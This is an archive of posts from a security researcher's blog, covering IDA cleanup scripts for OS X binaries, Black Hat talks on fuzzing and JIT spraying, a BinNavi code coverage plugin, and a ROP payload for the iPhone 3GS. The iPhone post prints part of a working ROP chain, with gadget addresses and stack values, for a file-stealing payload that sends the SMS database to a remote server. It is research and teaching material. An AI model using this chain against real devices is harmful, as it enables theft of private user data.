Author Archive

Objective-C phun on Mac OS X

2010-06-08

A few posts ago Jose showed a script to clean up ARM iPhone binaries. The x86 counterparts suffer from the same problems, so I thought it would be useful to have something similar for them. Both the behaviour and the algorithm behind the script are pretty much the same as in the one Jose wrote.
The real difference is in the “dumbish” dataflow tracing method we use. The calling convention on iPhone and OS X is different, so instead of tracing register assignments we have to trace stack variables, and of course we are on x86. We currently don’t track function arguments and complex operands. Of course it can be improved, but it still yields good results as it is :)
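
To give an idea of what tracing stack variables means here, below is a minimal sketch in plain Python. It is not the script from the repository and does not use the IDA API: the instruction tuples, the `resolve_msgsend_args` name and the sample symbol names are made up for illustration. It assumes the 32-bit x86 convention where the receiver is stored at [esp] and the selector at [esp+4] before the call to objc_msgSend, and it gives up on anything that is not a simple assignment.

```python
def resolve_msgsend_args(instructions, call_index):
    """Walk backwards from a call and return the last values stored to
    [esp] (receiver) and [esp+4] (selector), or None when unknown."""
    wanted = {"[esp]": "receiver", "[esp+4]": "selector"}
    found = {"receiver": None, "selector": None}
    seen = set()
    for mnemonic, dst, src in reversed(instructions[:call_index]):
        if mnemonic == "call":
            break  # an earlier call: its stack slots are unrelated
        if mnemonic == "mov" and dst in wanted and dst not in seen:
            seen.add(dst)
            # only plain symbols are tracked; registers and complex
            # operands are left unresolved
            if src.startswith("offset "):
                found[wanted[dst]] = src[len("offset "):]
        if len(seen) == len(wanted):
            break
    return found


# hypothetical listing, written as (mnemonic, destination, source)
listing = [
    ("mov", "eax", "[ebp+8]"),
    ("mov", "[esp+4]", "offset sel_length"),
    ("mov", "[esp]", "offset cls_NSString"),
    ("call", "_objc_msgSend", ""),
]
result = resolve_msgsend_args(listing, 3)
```

With the sample listing, `result` maps the receiver to `cls_NSString` and the selector to `sel_length`, which is the information needed to annotate the call site.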

Another problem you sometimes encounter when analyzing OS X binaries is that sections are not interpreted correctly. For this purpose I wrote a very simple script that cleans up the IDB of an OS X binary. Basically it will aggressively make functions in the __text segment and make sure that __cstring is actually interpreted as a segment containing strings and not code.
You can find both scripts on our company github repository.

If you want to learn a bit more about OS X hacking and reversing, consider taking the class that Dino Dai Zovi and I are going to teach at Black Hat USA.

ROP and iPhone

2010-04-16

As you might know, Ralf-Philipp Weinmann from the University of Luxembourg and I won Pwn2Own by owning the iPhone.

Smartphones are different beasts compared to desktops when it comes to exploitation. Specifically, the iPhone has a fairly important exploit mitigation, code signing, which makes both exploitation and debugging quite annoying and definitely raises the bar when it comes to writing payloads.

What smartphones usually lack, and that is the case for the iPhone as well, is ASLR. Put the two together and we have the perfect OS on which to use ROP payloads.

We are not authorized to talk about the exploit itself as it is being sold to ZDI. Nonetheless we want to give a brief explanation of the payload because, to the best of our knowledge, it is the first practical example of a weaponized payload on ARMv7 and iPhone 3GS.

In order to decide what kind of payload we want to write, another security countermeasure has to be taken into account, namely sandboxing.

On the iPhone most applications are sandboxed with different levels of restrictions. The sandboxing is done in a kernel extension using the MAC framework. A few well-known syscalls are usually denied (execve() to name one) and access to important files is normally restricted. One last important thing to notice is that the iPhone doesn’t have a shell, so that is not an option for our payload.

Luckily we are able to read files like the SMS database, the address book database and a few others containing sensitive information (this depends on the specific sandbox profile of the application).

A few notions are needed to be able to write ARM payloads; a lot of good information on the topic can be found here. I will nonetheless outline the basics below.

The first thing one has to understand before writing a ROP payload is the calling convention used in iPhoneOS.

For iPhone the first four arguments are passed using the r0-r3 registers. If other arguments are needed, they are pushed onto the stack. Functions usually return to the address held in the LR register, so when we write our payload we need to make sure that we control LR.
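
As a rough illustration of this convention, the following sketch splits a list of word-sized arguments into register and stack arguments. The function name `place_arguments` and the sample values are made up for the example, and it deliberately ignores details such as 64-bit arguments, which occupy two words.

```python
def place_arguments(args):
    """Split a call's arguments the way the text describes: the first
    four go in r0-r3, the rest are passed on the stack in order."""
    registers = {"r%d" % i: value for i, value in enumerate(args[:4])}
    stack = list(args[4:])
    return registers, stack


# mmap(addr, len, prot, flags, fd, offset) has six arguments
PROT_READ, MAP_PRIVATE = 0x1, 0x2
regs, stack = place_arguments([0, 0x1000, PROT_READ, MAP_PRIVATE, 3, 0])
```

Here `regs` holds the first four values under r0 to r3, while the file descriptor and the offset end up in `stack`. These stack arguments are what make such a call awkward to set up from a ROP payload.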

Another important difference between ARM ROP payloads and x86 ROP payloads is instruction size.

In ARM there are only two possible sizes for instructions: 4 bytes or 2 bytes. The second type is called THUMB mode. To execute THUMB instructions one has to branch (for instance with bx) to an address whose least significant bit is set; this causes the processor to switch to THUMB mode. More formally, the processor is in THUMB mode when the T bit in the CPSR is 1 and the J bit is 0.
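
In practice, an interworking branch such as bx uses the least significant bit of the target address to select the instruction set, so a THUMB gadget is entered at its address with bit 0 set. A tiny sketch (the helper names are ours, the gadget address is one used later in this post):

```python
def thumb_entry(address):
    """Address to branch to so that the code at `address` runs in THUMB mode."""
    return address | 1


def is_thumb_target(address):
    """True when a bx/blx to this address selects THUMB mode."""
    return (address & 1) == 1


gadget = 0x32988D5E           # where the instruction bytes actually live
entry = thumb_entry(gadget)   # value to place on the fake stack
```

This is why the gadget addresses stored in the payload further down are odd, while the disassembly next to them shows even addresses.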

Starting from ARMv7 a “hybrid” mode was introduced, THUMB2. This mode supports both 32-bit and 16-bit instructions (the switch between 32 bits and 16 bits is done following the same criteria explained before for THUMB).

One last thing to notice is that functions are usually called through b/bl/blx instructions, but when writing our payload we are almost always forced not to use bl and blx. Those two instructions save the address of the next instruction into the lr register, so we would lose control over the program flow.

I won’t describe in detail the concepts behind ROP as there is plenty of literature available. Tim is writing about ROP on ARM in our blog as well.

I will instead try to outline what important steps are needed when it comes to writing an ARM ROP payload on the iPhone.

In our exploit we know that some data we control lies in r0. The first thing we want to achieve is to control the stack pointer. So we have to find a sequence that allows us to switch the stack pointer with a memory region we control. We do this in two stages:

6a07 ldr r7, [r0, #32]
f8d0d028 ldr.w sp, [r0, #40]
6a40 ldr r0, [r0, #36]
4700 bx r0

// r0 is a pointer to the crafted data structure used in the exploit. We point r7 to our crafted stack, and r0 to the address of the next ROP gadget.
// The stack pointer points to something we don't control as the node is 40 bytes long. So we just jump to another code snippet which will put us in control of SP.

f1a70d00 sub.w sp, r7, #0 ;0x0
bd80 pop {r7, pc}
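
To make the two stages easier to follow, here is a small Python model of what the gadgets do to the registers. It is only a sketch: memory is a plain dictionary of 32-bit words, and every address and value in the example is invented.

```python
def run_pivot(mem, r0):
    """Emulate the two gadgets above on a dict that maps addresses to
    32-bit words. Returns (sp, r7, pc) after the final pop."""
    # stage 1
    r7 = mem[r0 + 32]    # ldr r7, [r0, #32]    -> our crafted stack
    sp = mem[r0 + 40]    # ldr.w sp, [r0, #40]  -> not under our control
    r0 = mem[r0 + 36]    # ldr r0, [r0, #36]    -> address of the second gadget
    pc = r0              # bx r0
    # stage 2
    sp = r7              # sub.w sp, r7, #0
    r7 = mem[sp]         # pop {r7, pc}
    pc = mem[sp + 4]
    sp += 8
    return sp, r7, pc


NODE, FAKE_STACK = 0x1000, 0x2000   # hypothetical addresses
mem = {
    NODE + 32: FAKE_STACK,          # ends up in r7, then in sp
    NODE + 36: 0x32001235,          # hypothetical address of the second gadget
    NODE + 40: 0xDEADBEEF,          # outside the 40-byte node
    FAKE_STACK: 0x41414141,         # popped into r7
    FAKE_STACK + 4: 0x32001001,     # popped into pc: first real gadget
}
sp, r7, pc = run_pivot(mem, NODE)
```

After the second gadget the stack pointer sits inside the fake stack, and every following `pop {..., pc}` takes its values from data we supplied.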

Now that we control the stack pointer we can take a closer look at our payload.

A file stealer payload should in principle do the following:

  1. Open a file
  2. Open a socket
  3. Connect to the socket
  4. Get the file size (using for instance fstat())
  5. Read the content of the file (in our case by mmaping it into memory)
  6. Write the content of the file to the remote server
  7. Close the connection
  8. Exit the process/continue execution

This is quite a long list for a ROP shellcode, so we are not going to discuss each and every step but just highlight the most important ones.

The first thing our payload needs to do is to control the content of the lr register. A gadget that allows us to do so is:

e8bd4080 pop {r7, lr}
b001 add sp, #4
4770 bx lr

Next we will see an example of how a function can be called using ROP on ARM. We take mmap() as an example because it has more than 4 arguments and is therefore a bit trickier:

ropvalues[i++] = 0x00000000; //r4 which will be the address for mmap
ropvalues[i++] = 0x00000000; //r5 whatever
ropvalues[i++] = 0x00000000; //r8 is gonna be the file len for mmap
ropvalues[i++] = 0x00000002; //r9 MAP_PRIVATE copied in r3
ropvalues[i++] = 0x32988d5f; // PC
//32988d5e bd0f pop {r0, r1, r2, r3, pc}

ropvalues[i++] = locFD - 36; // r0 contains the memory location where the FD is stored
ropvalues[i++] = locStat +60;	// r1 struct stat file size member
ropvalues[i++] = 0x00000001; // r2 PROT_READ
ropvalues[i++] = 0x00000000; // r3 is later used to store the FD in the following gadget
ropvalues[i++] = 0x32979837;
//32979836 6a43 ldr r3, [r0, #36]
//32979838 6a00 ldr r0, [r0, #32]
//3297983a 4418 add r0, r3
//3297983c bd80 pop {r7, pc}
ropvalues[i++] = sp + 73*4 + 0x10;
ropvalues[i++] = 0x32988673;
//32988672	 bd01	pop	{r0, pc}
ropvalues[i++] = sp -28; //r0 has to be a valid piece of memory we don't care about(we just care for r1 here)
ropvalues[i++] = 0x329253eb;
//329253ea 6809 ldr r1, [r1, #0]
//329253ec 61c1 str r1, [r0, #28]
//329253ee 2000 movs r0, #0 //this will reset to 0 r0 (corresponding to the first argument of mmap())
//329253f0 bd80 pop {r7, pc}
ropvalues[i++] = sp + 75*4 + 0xc; //we do this because later SP will depend on it
ropvalues[i++] = 0x328C5CBd;
//328C5CBC STR R3, [SP,#0x24+var_24]
//328C5CBE MOV R3, R9 //r9 was filled before with MAP_PRIVATE flag for mmap()
//328C5CC0 STR R4, [SP,#0x24+var_20]
//328C5CC2 STR R5, [SP,#0x24+var_1C]
//328C5CC4 BLX ___mmap
//328C5CC8 loc_328C5CC8 ; CODE XREF: _mmap+50
//328C5CC8 SUB.W SP, R7, #0x10
//328C5CCC LDR.W R8, [SP+0x24+var_24],#4
//328C5CD0 POP {R4-R7,PC}

ropvalues[i++] = 0xbbccddee;//we don't care for r4-r7 registers
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x32987baf;
//32987bae bd02 pop {r1, pc}

This payload snippet roughly translates to:

mmap(0x0, statstruct.st_size, PROT_READ, MAP_PRIVATE, smsdbFD, 0x0);

What we had to do here is both store arguments in registers (the easy part) and push two of them onto the stack.

Pushing arguments on the stack creates an extra problem when writing a ROP payload because we have to make sure our payload is aligned with the stack pointer. This is why we have to craft r7 in a specific way in line 26 of the listing above.
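
Keeping track of where each word of the payload will live is easier with a small helper. The class below is only a sketch of that bookkeeping, not the code we used: `RopChain`, its methods and the stack base address are invented for the example, while the gadget address comes from the listing.

```python
import struct


class RopChain(object):
    """Collects 32-bit little-endian words for a fake stack."""

    def __init__(self, stack_base):
        self.stack_base = stack_base   # address where the first word will live
        self.words = []

    def push(self, value):
        """Append one word and return the address it will occupy."""
        address = self.stack_base + 4 * len(self.words)
        self.words.append(value & 0xFFFFFFFF)
        return address

    def address_of_word(self, index):
        """Address of the word at `index`, e.g. to precompute an r7 value."""
        return self.stack_base + 4 * index

    def pack(self):
        """Serialize the chain as it has to appear in memory."""
        return struct.pack("<%dI" % len(self.words), *self.words)


chain = RopChain(stack_base=0x10000000)   # hypothetical stack address
chain.push(0x00000000)                    # value popped into r7
chain.push(0x32988D5E | 1)                # gadget from the listing, THUMB bit set
payload = chain.pack()
```

Expressions such as `sp + 73*4 + 0x10` in the listing are the hand-computed equivalent of `address_of_word()`: they point at a specific word further down the same fake stack.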

Finally we pop the program counter and jump to some other instructions in memory.

Having seen this payload one may wonder how to find the proper gadgets in the address space of a process.

As said before, the iPhone doesn’t have ASLR enforced, which means that every library mapped in the address space is a possible source of gadgets.

There are some automated tools to find those gadgets and compile them to form a ROP shellcode on x86. Unfortunately that is not the case for ARM. Our co-worker Tim maintains and develops a great tool written for his thesis that can ease the process of finding gadgets on ARM, and he is currently working on extending the tool to compile (or better, combine) gadgets to form valid shellcode.
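
To show the basic idea behind gadget hunting (this is not Tim's tool, just a naive sketch), the snippet below scans a buffer for the 16-bit THUMB encoding of `pop {..., pc}`, which is `0xBD00` plus a bit mask for r0-r7. The function name is ours. A real tool also has to disassemble backwards from each hit and cope with 32-bit THUMB2 instructions whose second half happens to look like a pop.

```python
import struct

REG_NAMES = ["r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7"]


def find_pop_pc(code, base):
    """Return (address, registers) for every 16-bit `pop {..., pc}`."""
    hits = []
    for offset in range(0, len(code) - 1, 2):
        (halfword,) = struct.unpack_from("<H", code, offset)
        if (halfword & 0xFF00) == 0xBD00:   # 1011 1101 rrrr rrrr
            regs = [REG_NAMES[i] for i in range(8) if halfword & (1 << i)]
            hits.append((base + offset, regs + ["pc"]))
    return hits


# bytes of the four-instruction gadget shown earlier: 6a43 6a00 4418 bd80
code = struct.pack("<4H", 0x6A43, 0x6A00, 0x4418, 0xBD80)
gadgets = find_pop_pc(code, base=0x32979836)
```

On this buffer the only hit is the `pop {r7, pc}` at 0x3297983c, matching the disassembly in the payload listing.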

As far as we know no techniques to disable code signing “on the fly” have been found on the latest firmware of iPhone.

It is therefore important for anyone trying to exploit an iPhone vulnerability to learn ROP programming.

One last thing has to be said: the iPhone security model is pretty robust as it is now.

If it ever supports ASLR, attacking it will be significantly harder than attacking any desktop OS. In fact, most applications are sandboxed, which greatly limits their ability to do harm, and code signing is always in place. ASLR will limit the ability to create ROP payloads, and there is neither Flash nor a JIT compiler to play with on the iPhone ;)

Finally, if you are interested in iPhone hacking you should attend the class that I am going to give together with Dino Dai Zovi at Black Hat USA. It will be on Mac OS X hacking, but most of the teaching material can be used on iPhone as well!

Cheers,
Vincenzo

Black Hat DC “report”

2010-02-10

As some of you might know, I gave a talk at BH DC this year about fuzzing; below are the slides and the white paper. I strongly suggest you take a look at the white paper first, as the slides are full of pictures and therefore not really useful from a learning point of view. If you have any questions or suggestions on the content, please feel free to write me an email or comment on this blog post.

I am not a big fan of conference reports and the like, but I feel like spending a few words on the attack shown by Dionysus Blazakis as I found it pretty relevant for real-world exploitation scenarios. I do not want to explain again what he did (both the white paper and the slides are public), but there are two important facts:

  1. Defeating DEP by using JITSpraying
  2. Defeating ASLR by exploiting a weakness in how hash maps are ordered

In Flash it is possible to combine the two: JIT-spray a piece of memory, insert the function object (with the shellcode) in a dictionary/set that uses hash maps for storing data, and use (2) to find the address of the shellcode.

The reason why this technique is so cool is that JITSpraying does not work just on Flash but on everything that contains a JIT compiler producing predictable output, and it is not trivially fixable. The technique for defeating ASLR is easier to fix (well, sort of), but it is still one of the most advanced attacks against it we have seen so far.

The bottom line: the sky isn’t falling, but if you are an exploit writer you really want to learn this technique. If you are not, you should learn it anyway; I expect to see quite a lot of exploits using this technique.

Black Hat DC preview

2010-01-27

On February 3rd I will be speaking at Black Hat DC. The talk is about fuzzing. Today Microsoft has its SDL, Adobe has apparently started fuzzing its own products and other companies are doing the same. The bottom line is that fuzzing is getting harder for us. In the talk I will explain how to create a new type of fuzzer by combining static analysis metrics and dynamic analysis techniques. This new approach will ease the process of fuzzing by totally removing the data-modeling part that is usually necessary with generation-based fuzzers. At the same time it will give better results than mutation-based fuzzers. I have written about some of the techniques and metrics used in the fuzzer in my previous blog posts. So to get a taste of the talk here are a few links: cyclomatic complexity, loop detection and code coverage.

Anyway, if you happen to be in DC during Black Hat or in NYC a few days after (4-7 February) and you want to talk with me about:

  1. Reverse engineering and the like: you have a problem that’s driving you crazy, you can solve one of those problems for me or you want to show me something very cool you are working on.
  2. Our products: you want more info, you know how to improve them, you want to congratulate me because they are *so* cool
  3. You feel generous and want to offer me a beer
  4. You want to insult me because this blog post is *very* annoying

Send me an email!

After the conference I will do a follow-up post with slides, white paper, code and what you have missed at the conference.

Cheers,

Vincenzo

Code coverage and BinNavi

2010-01-24

I have already explained in my previous posts how much I love static analysis; nonetheless, sometimes you have to get your hands dirty and use a debugger. In this post we will take a look at the BinNavi debugging APIs and how to use them to create a code coverage plugin. In a previous blog post I have spoken about how to use BinNavi “without BinNavi”, so in order to fully understand the rest of this post it is probably better to take a look at it first.

We implement code coverage at the basic block level, that is, we set a breakpoint at the beginning of each basic block inside a module. So the first thing to do is to retrieve the basic blocks of a given module. BinNavi exports a method to read the start address of each basic block belonging to a given module directly from the database, instead of iterating through the functions and retrieving the basic block structures. It should be noted, though, that this method cannot be used to modify basic block structures.

for module in mods:
    addresses = ModuleHelpers.getBasicBlockAddresses(module)
    for address in addresses:
        addr = address.toLong()
        # filter them using user-supplied lower and upper bound addresses
        if start_addr <= addr <= end_addr:
            blocks.append(addr)

print "Total basic blocks", len(blocks)

Of course those addresses need to be relocated at run-time, therefore the next task is to locate the module in memory and relocate each address accordingly. To do so we need to attach to the remote process and look for loaded modules until we find the one we are interested in:

def getRunningModule(self, moduleName):

    if self.debugger is None:
        return None

    self.debugger.process.addListener(self)
    self.name = moduleName

    if self.debugger.isConnected() is False:
        print "attaching to the remote target"
        self.debugger.connect()

    while self.module is None:
        continue

    self.debugger.suspend()

We suspend the target process here because before executing the process we first need to relocate the addresses and set breakpoints. We will resume it after both operations are completed.

As you might have noticed, before attaching to the remote target we register a listener for the target process.
There are a few types of listener classes useful for our purposes, most notably IDebuggerListener and IProcessListener. Both of them are notified when common debugging events happen. To learn more about those listeners I suggest you take a look at the documentation.
In our class we implement a few methods of the IProcessListener class, which are called by the dispatcher inside BinNavi when certain messages are delivered from the remote debugger.

def changedTargetInformation(self, process):
    self.debugger.resume()

def addedModule(self, process, mod):
    if self.module != None:
        return
    for module in process.modules:
        if module.name.find(self.name) != -1:
            self.module = module

The first method is called when the debugger attaches to the target process and retrieves some basic information on it. We need to resume the process at that point because the debugger suspends it after the initialization (notice that the call to suspend() in the previous code snippet happens after we locate the module in memory, that is, after we call resume() here).

The second method is called whenever a new image is loaded in the process address space. In our code as soon as we find the module we are looking for we don’t care about other images.

Now that we have the module in-memory we can relocate the addresses:

inMemoryAddr = runningModule.baseAddress.toLong()
originBaseAddr = self.naviDB.module.imagebase.toLong()
print "Original Base Address: %x In-Memory one: %x\n Relocating..\n" % (originBaseAddr, inMemoryAddr)
for bb in self.blocks:
    addresses.append((bb - originBaseAddr) + inMemoryAddr)
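
The relocation itself is just a rebase by the difference between the two base addresses. A standalone sketch with made-up values (the `relocate` helper is ours, not part of BinNavi):

```python
def relocate(addresses, original_base, in_memory_base):
    """Rebase static addresses onto the base the module was loaded at."""
    delta = in_memory_base - original_base
    return [address + delta for address in addresses]


# hypothetical values: image base in the database vs. base seen by the debugger
static_blocks = [0x01001000, 0x01001234]
runtime_blocks = relocate(static_blocks, 0x01000000, 0x00FF0000)
```

When the module is loaded at its preferred base the delta is zero and the addresses are left unchanged.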

I lied when I said we need to set breakpoints: in fact BinNavi takes care of that internally by means of a TraceLogger!

for address in addresses:
    naviAddresses.append(TracePoint(self.traceEntity, Address(address)))

print "Starting the process...\n"
tracer = TraceLogger(self.debugger, self.traceEntity)
self.traceManager = myTraceListener(addresses)
self.trace = tracer.start("codeCoverage", "", naviAddresses)
self.trace.addListener(self.traceManager)
self.debugger.resume()

TraceLogger is a class which lets us create a log of echo breakpoint events: we create a list of TracePoints (locations where the trace logger sets echo breakpoints) and the TraceLogger takes care of the rest.

Echo breakpoints are a ‘lightweight’ version of regular breakpoints. In essence, echo breakpoints get removed after they are initially hit. This leads to better performance of the application that is being debugged, as execution speed of a particular path is only slowed down during the -first- execution.
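
The behaviour can be modelled in a few lines of Python. This is only a toy model of the idea, not how BinNavi implements it, and the class and method names are invented:

```python
class EchoBreakpoints(object):
    """Breakpoints that are removed the first time they are hit."""

    def __init__(self, addresses):
        self.pending = set(addresses)
        self.hit = []

    def on_execute(self, address):
        """Called for every executed block; True if a breakpoint fired."""
        if address in self.pending:
            self.pending.remove(address)   # later executions run at full speed
            self.hit.append(address)
            return True
        return False


bps = EchoBreakpoints([0x1000, 0x1010, 0x1020])
fired = [bps.on_execute(a) for a in [0x1000, 0x1010, 0x1000, 0x1000]]
coverage = float(len(bps.hit)) / 3
```

Only the first execution of each block pays the breakpoint cost, and that is all code coverage needs: whether a block was reached at least once.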

So first we set up the tracer and then we create the trace. A trace can have a listener which is notified when a new event is added; we use such a listener to keep track of the blocks touched during the execution.

class myTraceListener(ITraceListener):
    def __init__(self, addresses):
        self.addyCount = []
        for address in addresses:
            self.addyCount.append((address, 0))

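    def addedEvent(self, trace, event):
        # update the entry in place: removing and appending while iterating
        # can visit the same address twice and count it more than once
        for i, (addy, counter) in enumerate(self.addyCount):
            if addy == event.address:
                self.addyCount[i] = (addy, counter + 1)
                break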

When a new event is added, we retrieve the address and update the address counter accordingly.
At this point we are all set, and we can get the code coverage score:

    def getCodeCoverage(self):
        # get the list of all the executed blocks at a given program point
        touched_blocks = self.naviTracer.getExecBlocks()
        coverage = float(len(touched_blocks)) / float(len(self.getBlocks()))
        return coverage

    def printStatistics(self):
        print "CODE COVERAGE = %f\n" % self.getCodeCoverage()

Let’s run it then! On the target machine we run:

client32.exe C:\WINDOWS\system32\calc.exe

and on the local machine:

jython NaviCoverage.py databaseHost databaseUser databasePassword databaseName calc.exe

And here’s a screenshot

That’s all for now.